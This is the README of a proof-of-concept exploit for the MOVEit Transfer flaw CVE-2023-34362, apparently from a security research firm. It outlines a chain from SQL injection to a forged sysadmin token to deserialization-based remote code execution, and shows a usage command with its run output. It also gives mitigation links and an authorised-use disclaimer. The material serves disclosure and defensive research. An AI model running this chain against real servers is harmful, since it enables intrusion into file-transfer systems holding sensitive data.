# CVE-2023-34362
POC for CVE-2023-34362 affecting MOVEit Transfer

## Technical Analysis
A technical root cause analysis of the vulnerability can be found on our blog:
https://www.horizon3.ai/moveit-transfer-cve-2023-34362-deep-dive-and-indicators-of-compromise/

## Summary
This POC abuses an SQL injection to obtain a sysadmin API access token and then use that access to abuse a deserialization call to obtain remote code execution.

This POC needs to reach out to an Identity Provider endpoint which hosts proper RS256 certificates used to forge arbitrary user tokens - by default this POC uses our IDP endpoint hosted in AWS.

By default, the exploit will write a file to C:\Windows\Temp\message.txt. Alternative payloads can be generated by using the ysoserial.net project.

## Usage
```plaintext
python CVE-2023-34362.py https://127.0.0.1
[*] Getting sysadmin access token
[*] Got access token
[*] Getting FolderID
[*] Got FolderID: 963611079
[*] Starting file upload
[*] Got FileID: 965943963
[*] Injecting the payload
[*] Payload injected
[*] Triggering payload via resume call
[+] Triggered the payload!
[*] Deleting uploaded file
```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023

## Follow the Horizon3.ai Attack Team on Twitter for the latest security research:
*  [Horizon3 Attack Team](https://twitter.com/Horizon3Attack)
*  [James Horseman](https://twitter.com/JamesHorseman2)
*  [Zach Hanley](https://twitter.com/hacks_zach)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
